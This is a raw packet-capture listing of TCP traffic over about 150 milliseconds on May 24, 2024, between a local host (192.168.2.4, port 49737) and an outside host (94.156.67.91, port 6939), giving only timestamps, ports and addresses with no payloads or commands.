May 24, 2024 05:09:49.565417051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.565469027 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.565675974 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.565685987 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.565696955 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.565826893 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.565828085 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.565983057 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.565993071 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.566055059 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.566214085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.566384077 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.566394091 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.566402912 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.566411972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.566425085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.566437006 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.566478014 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.566478014 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.566916943 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.566926956 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.566936970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.566984892 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.567332983 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.567342997 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.567352057 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.567361116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.567385912 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.567387104 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.567708015 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.567718029 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.567755938 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.569037914 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.569047928 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.569056988 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.569089890 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.569122076 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.570311069 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.570319891 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.570362091 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.571625948 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.571636915 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.571645021 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.571681976 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.573807955 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.573818922 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.573858023 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.575978994 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.575989008 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.576148987 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.576244116 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.576253891 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.576299906 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.577203989 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.577214956 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.577271938 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.577460051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.577470064 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.577516079 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.577548027 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.577593088 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.577816010 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.577825069 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.577867031 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.578533888 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.578545094 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.578552961 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.578562021 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.578594923 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.578629971 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.580719948 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.581885099 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.582036018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.582057953 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.582308054 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.582318068 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.582360983 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.582840919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.582890987 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.585488081 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.585498095 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.585550070 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.586420059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.586591005 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.586776018 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.586859941 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.586869001 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.586921930 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.587125063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.587133884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.587142944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.587177038 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.590246916 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.590481043 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.591511965 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.591646910 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.591691017 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.591909885 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.591921091 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.591955900 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.592214108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.592223883 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.592233896 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.592262030 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.594991922 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.595046997 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.600265026 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.600394011 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.600564957 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.600646973 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.600889921 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.600902081 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.600950003 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.601213932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.601223946 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.601264954 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.604486942 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.604496956 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.604630947 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.604722977 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.604732990 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.604865074 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.604868889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.604907036 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.605150938 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.605451107 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.605459929 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.605498075 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.605916977 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.605959892 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.612324953 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.612514019 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.612648964 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.612694979 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.612993956 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.613003016 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.613013029 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.613022089 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.613130093 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.613130093 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.615727901 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.615781069 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.615992069 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.616003036 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.616111994 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.616130114 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.616427898 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.616440058 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.616449118 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.616468906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.616478920 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.616507053 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.617180109 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.617223024 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.619332075 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.619447947 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.619502068 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.619683027 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.619693995 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.619743109 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.619987965 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.619997978 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.620007992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.620033979 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.622011900 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.622086048 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.646121025 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.646131992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.646306038 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.646471024 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.646599054 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.646610022 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.646646976 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.646650076 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.646657944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.646689892 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.650870085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.650927067 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.654156923 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.654366970 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.654499054 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.654501915 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.654714108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.654846907 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.655002117 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.655011892 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.655020952 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.655030012 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.655045986 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.655077934 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.655586004 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.655596018 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.655644894 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.656014919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.656023979 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.656032085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.656064034 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.656470060 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.656478882 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.656487942 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.656496048 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.656507969 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.656524897 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.657265902 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.657311916 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.657516003 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.657525063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.657533884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.657541990 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.657551050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.657567024 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.657584906 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.658366919 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.658376932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.658384085 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.658392906 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.658401966 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.658410072 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.658421993 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.658437967 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.659207106 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.659215927 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.659224987 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.659254074 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.659270048 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.659835100 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.659843922 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.659852982 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.659862041 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.659882069 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.659897089 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.663089037 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.663824081 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.663872957 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.663948059 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.664144993 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.664268017 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.664381981 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.664391994 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.664428949 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.665899992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.665910959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.665956974 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.665999889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.666239023 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.666249037 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.666279078 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.666682959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.666692972 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.666701078 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.666728020 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.666754961 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.667082071 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.667912006 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.667952061 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.670739889 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.671087980 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.671143055 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.671391010 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.671807051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.671816111 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.671823978 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.671854019 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.671885967 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.672579050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.672996998 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.673048973 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.675327063 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.675471067 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.675525904 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.675801039 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.675811052 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.675858974 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.676369905 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.677758932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.677767992 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.677803993 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.680454016 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.680509090 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.680620909 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.680910110 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.680921078 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.680969954 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.681256056 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.681269884 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.681278944 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.681303024 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.681333065 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.682518959 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.689187050 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.689239025 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.689486980 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.689743042 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.689903975 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.690134048 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.690510988 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.690521002 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.690583944 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.693284988 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.693295002 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.693336010 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.693485022 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.693624973 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.693861961 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.694240093 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.694250107 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.694293022 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.694963932 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.695008039 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.695343971 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.700862885 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.700911999 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.701025009 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.701405048 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.701447010 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.701783895 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.701792955 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.701802015 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.701828003 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.702517033 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.702564955 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.704637051 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.704821110 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.704829931 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.704864979 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.705213070 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.705252886 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.705588102 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.705596924 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.705637932 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.706315994 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.706686974 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.706723928 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.708331108 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.708503962 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.708550930 CEST	49737	6939	192.168.2.4	94.156.67.91
May 24, 2024 05:09:49.708792925 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.709110975 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.709120035 CEST	6939	49737	94.156.67.91	192.168.2.4
May 24, 2024 05:09:49.709150076 CEST	49737	6939	192.168.2.4	94.156.67.91
